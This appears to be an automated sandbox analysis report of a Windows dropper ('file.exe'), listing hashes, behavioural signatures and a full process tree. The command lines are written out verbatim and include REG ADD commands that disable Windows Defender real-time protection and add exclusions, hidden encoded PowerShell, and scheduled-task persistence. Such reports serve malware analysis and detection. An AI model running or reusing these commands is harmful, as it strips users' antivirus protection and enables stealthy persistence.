Analysis

max time kernel: 151s
max time network: 148s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 03-10-2022 07:02

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en

General

Target: file.exe
Size: 7.3MB
MD5: 2b9f7e62a158f46bbd476a09f6309c99
SHA1: 53ca5afbe82b5b577b8d754d0b0248b02dfe1776
SHA256: 28d501fd312d71c533498aa5d35e408b68820206ffd34dce7c38018fd5e4f34d
SHA512: 2e9ce5a4d0f7dee3491365105103d830918d670ce924e8314441bfaeb44277bb745d96c0dfc3378c933247111d3dd94a2bddb47a5e3f1bb03f093a6e44bb9b48
SSDEEP: 196608:91OmzwtIA+YzrVJAJ2GgUqONGvjGLMpdAs6vw:3O1uA+YvXAJ2Gg5ONgGMpupvw
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Windows security bypass
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CEEEIGvNcEpIBnVB = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VnSvEXTIbraTatzTOsR = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jIUrjTqJU = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nVCmSimpmwUn = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jIUrjTqJU = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twylNxKJekDU2 = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CEEEIGvNcEpIBnVB = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCMDmHxGrLJHC = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCMDmHxGrLJHC = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VnSvEXTIbraTatzTOsR = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nVCmSimpmwUn = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twylNxKJekDU2 = "0" | reg.exe
Executes dropped EXE 3 IoCs
Processes:
  pid | process
  1548 | Install.exe
  1528 | Install.exe
  908 | SEcCofr.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Loads dropped DLL 8 IoCs
Processes:
  pid | process
  1132 | file.exe
  1548 | Install.exe
  1548 | Install.exe
  1548 | Install.exe
  1548 | Install.exe
  1528 | Install.exe
  1528 | Install.exe
  1528 | Install.exe
Drops file in System32 directory 8 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | SEcCofr.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | SEcCofr.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | SEcCofr.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
Drops file in Windows directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  1336 | schtasks.exe
  316 | schtasks.exe
  1696 | schtasks.exe
  1688 | schtasks.exe
  1452 | schtasks.exe
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS 8 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host | wscript.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
  pid | process
  1908 | powershell.EXE
  1908 | powershell.EXE
  1908 | powershell.EXE
  816 | powershell.EXE
  816 | powershell.EXE
  816 | powershell.EXE
  1592 | powershell.EXE
  1592 | powershell.EXE
  1592 | powershell.EXE
  1624 | powershell.EXE
  1624 | powershell.EXE
  1624 | powershell.EXE
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1908 | powershell.EXE
  Token: SeDebugPrivilege | 816 | powershell.EXE
  Token: SeDebugPrivilege | 1592 | powershell.EXE
  Token: SeDebugPrivilege | 1624 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process | count
  PID 1132 wrote to memory of 1548 | 1132 | file.exe | Install.exe | 7
  PID 1548 wrote to memory of 1528 | 1548 | Install.exe | Install.exe | 7
  PID 1528 wrote to memory of 572 | 1528 | Install.exe | forfiles.exe | 7
  PID 1528 wrote to memory of 1328 | 1528 | Install.exe | forfiles.exe | 7
  PID 572 wrote to memory of 1708 | 572 | forfiles.exe | cmd.exe | 7
  PID 1328 wrote to memory of 1880 | 1328 | forfiles.exe | cmd.exe | 7
  PID 1708 wrote to memory of 1816 | 1708 | cmd.exe | reg.exe | 7
  PID 1880 wrote to memory of 1988 | 1880 | cmd.exe | reg.exe | 7
  PID 1708 wrote to memory of 1336 | 1708 | cmd.exe | reg.exe | 7
  PID 1880 wrote to memory of 920 | 1880 | cmd.exe | reg.exe | 1
Processes

Each entry gives the process image, its command line and the signatures it triggered; the bracketed number is the depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exe
      command line: .\Install.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exe
        command line: .\Install.exe /S /site_id "525403"
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Drops file in System32 directory
        - Enumerates system info in registry
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\forfiles.exe
          command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
      [4] C:\Windows\SysWOW64\forfiles.exe
          command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
          [6] \??\c:\windows\SysWOW64\reg.exe
              command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /CREATE /TN "gXcbmvcRy" /SC once /ST 03:53:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          (the -EncodedCommand value, here and in every later schtasks /CREATE and powershell.EXE entry, is the UTF-16LE base64 encoding of: start-process -WindowStyle Hidden gpupdate.exe /force)
          - Creates scheduled task(s)
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /run /I /tn "gXcbmvcRy"
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /DELETE /F /TN "gXcbmvcRy"
      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe\" d8 /site_id 525403 /S" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)

[1] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {35D01037-5F06-4226-9C68-40DB8321DA55} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        command line: "C:\Windows\system32\gpupdate.exe" /force

[1] C:\Windows\system32\gpscript.exe
    command line: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {DB9F9B70-F6BB-4928-8BE0-375C74F5BC0E} S-1-5-18:NT AUTHORITY\System:Service:
  [2] C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe
      command line: C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe d8 /site_id 525403 /S
      - Executes dropped EXE
      - Drops file in System32 directory
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "gLITuJqoR" /SC once /ST 06:17:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "gLITuJqoR"
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /DELETE /F /TN "gLITuJqoR"
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "giQkrcyHx" /SC once /ST 05:30:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "giQkrcyHx"
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /DELETE /F /TN "giQkrcyHx"
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"
    [3] C:\Windows\SysWOW64\wscript.exe
        command line: wscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
